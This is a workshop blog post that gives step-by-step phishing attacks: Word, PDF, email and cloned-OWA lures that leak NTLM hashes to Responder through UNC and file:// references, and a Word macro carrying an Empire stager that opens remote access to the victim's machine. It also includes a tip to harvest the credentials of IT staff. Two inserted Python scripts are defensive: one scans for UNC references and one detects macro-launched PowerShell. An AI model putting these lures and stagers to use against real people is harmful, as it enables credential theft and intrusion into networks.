Remote SE 101 Workshop

This blog post details the material covered at the Bsides Leeds Remote SE 101 Workshop.

What is Universal Naming Convention (UNC)?

UNC is amazing!

Microsoft Windows Universal Naming Convention (UNC) is a method to identify a shared resource or file on a remote computer.

Microsoft Windows uses the following UNC name format: \\servername\sharename\path\filename. Windows also accepts UNC syntax for WebDAV share access, rather than a URL. This behaviour can be exploited to trick a user into submitting their authentication details without any knowledge of doing so.


UNC Word Documents

Create an MS Word document, tweaking the visual appearance as required. Examples that work great during social engineering assignments are CVs or job information, under the pretence of it being sent from a job recruiter.

Click on INSERT / Quick Parts / Insert Field


Choose IncludePicture, add your UNC link (the IP address of the SMB listener) under the “Filename or URL” properties field, tick “Data not stored with the document” and click OK.


Save the Word document as a .docx file.

Next, start Responder; you are then ready to send your Word document with the embedded UNC image request.

Responder

root@kali:~ # responder -I eth0 -wrfv --lm

Directory for responder hashes /usr/share/responder/logs/

Video showing how to do this – UNC Exploit S01E02 Word – Social Engineering

UNC PDF Documents

Create a Word document as desired (CVs look good for this), but this time highlight the word you want a user to click, then right click and select Hyperlink.


Add your UNC hyperlink file://192.168.56.101/dshdsds


Save as PDF


Open the PDF and click on the link. You will see a warning, which is a good reason for testing!


Click Allow and you should see hashes in Responder.


UNC Emails

UNC-embedded emails are trivial to set up. They are commonly used as a quick test of whether a target has correct outbound filters in place, and to snag credentials.

Create your email and select which word you would like to add as your UNC hyperlink.


Highlight the chosen word and then right click and select ‘Hyperlink’.


Leave ‘Text to display:’ the same unless you wish to change it, but under ‘Address:’ add a UNC address such as file://Your-IP-Address/UNC. The directory section (/UNC) does not have to be accessible and can simply be made up.


Your email is now ready to test. Send it to your test account, click on the link and you should receive hashes.

Video showing how to do this – UNC Exploit S01E01 Email – Social Engineering

UNC Cloned Website

This is a great attack as it doubles as a standard credential harvester and a UNC embed attack. Simply browsing the site using IE, combined with weak outbound firewall settings, will result in you collecting hashes.

IT teams will often nose at a site that has been reported as suspicious; snag their creds!

To start with, clone your target site. You can do this in any way you like; personally I commonly use a clone of OWA as it works great.

Side note here: during your recon stage, if you notice the target does not use OWA, it is still a good selection as people regard it as a credible service. A simple email informing people that a new OWA service has been created works great.

To clone a site using setoolkit:

root@kali:~ # setoolkit

Select option ‘1. Social-Engineering Attacks’.


Select option ‘2. Website Attack Vectors’.


Select option ‘3. Credential Harvester Attack Method’.


Select option ‘2. Site Cloner’.


Add the IP address of your Kali VM.


IP address for the POST back in Harvester/Tabnabbing:192.168.0.20

Add the site you wish to clone.


SET will ask you if you wish it to start Apache – Select y

[!] Apache may be not running, do you want SET to start the process? [y/n]: y

Your cloned site should now be up and running. All that remains is to add the UNC request to the index page.

Location of the index file: /var/www/html


Right click on the ‘index.html’ file and select ‘Open With Other Application’.


Then add your UNC request with your own IP address to the bottom of the index page.

<img src="file:///\\192.168.0.20/test">


Responder

root@kali:~ # responder -I eth0 -wrfv --lm

Directory for responder hashes /usr/share/responder/logs/

Browse the index page using IE and you should see hashes.

Video showing how to do this – UNC Exploit S01E03 Web Server – Social Engineering
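The Word IncludePicture field, the PDF and email hyperlinks and the cloned page's img tag above all rely on the same thing: a UNC or file:// reference whose host is the listener. As an added, defender-side example (not part of the workshop material and not from Responder, SET or any other tool mentioned here), the following Python script finds those references before a client ever follows them. It unpacks a .docx and walks its XML parts, scans any HTML or mail body, extracts the host of every \\host\share or file://host/... reference, and flags hosts outside an allowlist of known internal file servers. The sample .docx, the HTML fragment, the allowlist and the 192.0.2.x addresses (the RFC 5737 documentation range) are all constructed for this example; the regular expression and function names are my own.

```python
import io
import re
import zipfile
from dataclasses import dataclass

# Matches the three spellings of a UNC target seen in the workshop material:
#   \\host\share           raw UNC (Word fields double the backslashes: \\\\host\\share)
#   file://host/share      hyperlink form used in the PDF and e-mail variants
#   file:///\\host/share   form used in the cloned web page's <img> tag
# The trailing group swallows the rest of the path so "\\share" is not read as a second host.
UNC_RE = re.compile(
    r'(?:file:/{2,}\\*|\\{2,})'          # file:// prefix (optionally followed by backslashes) or a bare \\ prefix
    r'([A-Za-z0-9][A-Za-z0-9.\-]*)'      # the host the client would authenticate to (IPv4 literal or DNS name)
    r'(?:[\\/][^\s"\'<>&]*)?',           # optional share/path, stopped at quotes, tags or XML entities
    re.IGNORECASE,
)


@dataclass
class UncRef:
    location: str   # document part or body the reference was found in
    host: str       # server that would receive the client's NTLM authentication
    raw: str        # matched text, for the analyst's report


def find_unc_references(text: str, location: str = "body") -> list:
    """Return every UNC / file:// reference found in a text blob."""
    return [UncRef(location, m.group(1), m.group(0)) for m in UNC_RE.finditer(text)]


def scan_docx(data: bytes) -> list:
    """A .docx is a zip. INCLUDEPICTURE fields live in word/document.xml and external
    picture targets can also sit in word/_rels/*.rels, so every XML and rels part is scanned."""
    refs = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith((".xml", ".rels")):
                refs.extend(find_unc_references(zf.read(name).decode("utf-8", "replace"), name))
    return refs


def flag_untrusted(refs: list, allowed_hosts: set) -> list:
    """Keep only references whose host is not a known internal file server."""
    return [r for r in refs if r.host.lower() not in allowed_hosts]


def build_sample_docx() -> bytes:
    """Constructed minimal .docx carrying an INCLUDEPICTURE field with the \\d switch
    ("Data not stored with the document"), the shape the Quick Parts steps above produce."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p>'
        '<w:fldSimple w:instr=" INCLUDEPICTURE &quot;\\\\\\\\192.0.2.10\\\\share\\\\logo.png&quot; \\d ">'
        '<w:r><w:t>Curriculum Vitae</w:t></w:r></w:fldSimple>'
        '</w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed HTML body: an e-mail style hyperlink, a cloned-page style <img> tag,
# and two benign references (HTTPS image, internal file server) that must not be flagged.
SAMPLE_HTML = (
    '<a href="file://192.0.2.10/UNC">Open the new OWA portal</a>\n'
    '<img src="https://example.com/logo.png">\n'
    '<a href="file://fileserver.corp.example/share/policy.docx">Policy</a>\n'
    '<img src="file:///\\\\192.0.2.10/test">\n'
)
ALLOWED_HOSTS = {"fileserver.corp.example"}   # constructed allowlist of internal file servers

if __name__ == "__main__":
    findings = flag_untrusted(scan_docx(build_sample_docx()), ALLOWED_HOSTS)
    findings += flag_untrusted(find_unc_references(SAMPLE_HTML, "mail/html body"), ALLOWED_HOSTS)
    for f in findings:
        print(f"{f.location}: client would authenticate to {f.host} via {f.raw!r}")
```

Run stand-alone it prints one line per flagged reference (one from the .docx, two from the HTML). A scanner like this belongs at the mail gateway or in a sandbox, alongside the outbound control the write-up keeps pointing at: when SMB (TCP 445/139) and WebDAV are blocked at the perimeter, the embedded reference never reaches the listener and no hash leaves the network.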

Empire Macros

Modern phishing attacks commonly contain malicious payloads, which once triggered will grant the remote attacker access to the victim’s internal network.

Windows macros offer an attacker the ability to run local commands on a victim’s machine without the user’s knowledge or consent.

Modern macros commonly rely on PowerShell running shellcode in the system's memory to help bypass restrictions such as antivirus protection.

Once the macro has been triggered the attacker gains remote access to the victim's machine. Human participation is initially required for the malicious payload to execute.

To download Empire:

git clone https://github.com/EmpireProject/Empire.git

Location of the install script in Empire: /root/Empire/setup/

root@kali:~/Empire# ./setup/install.sh

Once installed you can start it by running the following:

root@kali:~/Empire# ./empire

The first thing you need to do is set up a local listener.

(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name Listener1-http
(Empire: listeners/http) > set BindIP 10.0.2.15
(Empire: listeners/http) > execute
[*] Starting listener 'Listener1-http'
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) >

Next you need to create a payload; use usestager for this.

(Empire: listeners) > usestager (press tab to see all)
multi/bash                osx/applescript           osx/jar                   osx/pkg                   windows/dll               windows/launcher_lnk      windows/macroless_msword 
multi/launcher            osx/application           osx/launcher              osx/safari_launcher       windows/ducky             windows/launcher_sct      windows/teensy           
multi/pyinstaller         osx/ducky                 osx/macho                 osx/teensy                windows/hta               windows/launcher_vbs     
multi/war                 osx/dylib                 osx/macro                 windows/bunny             windows/launcher_bat      windows/macro

To create a Windows macro:

(Empire: listeners) > usestager windows/macro Listener1-http
(Empire: stager/windows/macro) > execute
[*] Stager output written out to: /tmp/macro
(Empire: stager/windows/macro) > back
(Empire: listeners) >

Open your created macro in gedit or any other editor, select all and copy it.


You now need to open up Microsoft Word in your Windows VM.

By default the Developer tab is not enabled on the ribbon in Office applications. To enable it, so you can paste your macro into Visual Basic, go to File / Options / Customize Ribbon and tick Developer.


Then click OK. Once back in Word, click on the newly added Developer tab on the ribbon, then click on Visual Basic.


Now right click on ThisDocument / Insert / Module.


Then paste the copied macro from Empire into the Module1 (code) field.


Now use Save As to save the document as a Word 97-2003 Document.


You can now open the macro embedded document to test if it works. Once you click on the Enable Content switch the macro will run.


If the macro has worked you should see the connection being received on your Empire listener.
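The connection the listener receives is the tail end of a process chain that is easy to spot from the defender's side. As an added example, not from the workshop material and not from the Empire project, here is the detection logic a SOC would run over process-creation telemetry in the shape of Sysmon Event ID 1: Word (or another Office application) spawning a script host, and PowerShell launched with the hidden-window, no-profile, non-interactive and encoded-command flags typical of a stager that runs in memory. The event records, computer names, process IDs and command lines are constructed; the flag patterns are my assumptions based on PowerShell's documented parameters, and the Sysmon field names are the ones that event uses.

```python
import json
import re
from pathlib import PureWindowsPath
from typing import Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}

# Launch flags typical of an in-memory stager. PowerShell accepts any unambiguous prefix
# of a parameter name, so the short spellings (-NoP, -NonI, -W, -Enc) are matched as well.
SUSPICIOUS_FLAGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-Expression|\bIEX\b", re.I),
}


def base_name(path: str) -> str:
    """Lower-cased executable name, e.g. 'C:\\...\\WINWORD.EXE' -> 'winword.exe'."""
    return PureWindowsPath(path).name.lower()


def analyse_event(event: dict) -> Optional[dict]:
    """Score one process-creation record; returns None when nothing is suspicious."""
    image = base_name(event.get("Image", ""))
    parent = base_name(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    # Parent/child relationship: an Office application should not be launching script hosts.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawns_script_host:{parent}->{image}")
    # Command-line shape: stager-style PowerShell flags, regardless of parent.
    if image == "powershell.exe":
        reasons.extend(name for name, rx in SUSPICIOUS_FLAGS.items() if rx.search(cmdline))
    if not reasons:
        return None
    return {"computer": event.get("Computer"), "pid": event.get("ProcessId"), "reasons": reasons}


def scan_events(lines: list) -> list:
    """Run analyse_event over JSON-lines telemetry and collect the hits in order."""
    hits = []
    for line in lines:
        result = analyse_event(json.loads(line))
        if result:
            hits.append(result)
    return hits


# Constructed Sysmon-style Event ID 1 records, trimmed to the fields the logic uses.
# Event 2 is the macro chain from the write-up; events 1 and 3 are benign; event 4 is
# Outlook spawning cmd.exe with no PowerShell flags at all.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"Computer": "WS01", "ProcessId": 4120,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n CV.doc'},
    {"Computer": "WS01", "ProcessId": 4388,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     # the base64 blob is a placeholder, not a real encoded command
     "CommandLine": "powershell -NoP -NonI -W Hidden -Enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"Computer": "SRV02", "ProcessId": 912,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\Scripts\nightly-backup.ps1"},
    {"Computer": "WS07", "ProcessId": 2204,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": 'cmd.exe /c "echo test"'},
]]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"{hit['computer']} pid {hit['pid']}: {', '.join(hit['reasons'])}")
```

The two checks are deliberately independent: the parent/child rule catches the macro even when the command line is obfuscated, and the flag rule catches the same stager when it is launched by something other than Office. Event 3 shows why the flag rule looks for stager-specific switches rather than for PowerShell itself; an administrator running a scheduled script from cmd.exe produces no hit.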


Empire calls all connected machines agents; you can view all your agents by running the following command.

(Empire: agents) > agents


To interact with an agent, run the following command, changing the agent name as required.

(Empire: agents) > interact 953KSCFG

Unless you have used Empire before, the first command you should run is help, which will give you a list of the commands available for use with your agent.

(Empire: 953KSCFG) > help
Agent Commands
==============
agents            Jump to the agents menu.
back              Go back a menu.
bypassuac         Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear             Clear out agent tasking.
creds             Display/return credentials from the database.
download          Task an agent to download a file.
downloads         Return downloads or kill a download job
exit              Task agent to exit.
help              Displays the help menu or synt

Typical commands such as ipconfig and sysinfo can be used to enumerate the connected machine.

(Empire: 953KSCFG) > ipconfig
Description      : Intel(R) PRO/1000 MT Desktop Adapter
DHCPEnabled      : True
IPAddress        : 192.168.1.9
IPSubnet         : 255.255.255.0
DefaultIPGateway : 192.168.1.1
DNSServer        : 192.168.1.1
DNSHostName      : IE11Win7
(Empire: 953KSCFG) > sysinfo
(Empire: 953KSCFG) > sysinfo: 0|http://192.168.1.7:80|IE11WIN7|IEUser|IE11WIN7|192.168.1.9|Microsoft Windows 7 Enterprise |False|powershell|236|powershell|2
Listener:         http://192.168.1.7:80
Internal IP:    192.168.1.9
Username:         IE11WIN7\IEUser
Hostname:       IE11WIN7
OS:               Microsoft Windows 7 Enterprise
High Integrity:   0
Process Name:     powershell
Process ID:       236
Language:         powershell
Language Version: 2

If you make a mess at any point you can reset all of Empire by running the following. Note that this will delete your DB and restart Empire as a fresh install.

root@kali:~/Empire/setup# ./reset.sh

@5ub34x and @myexploit2600
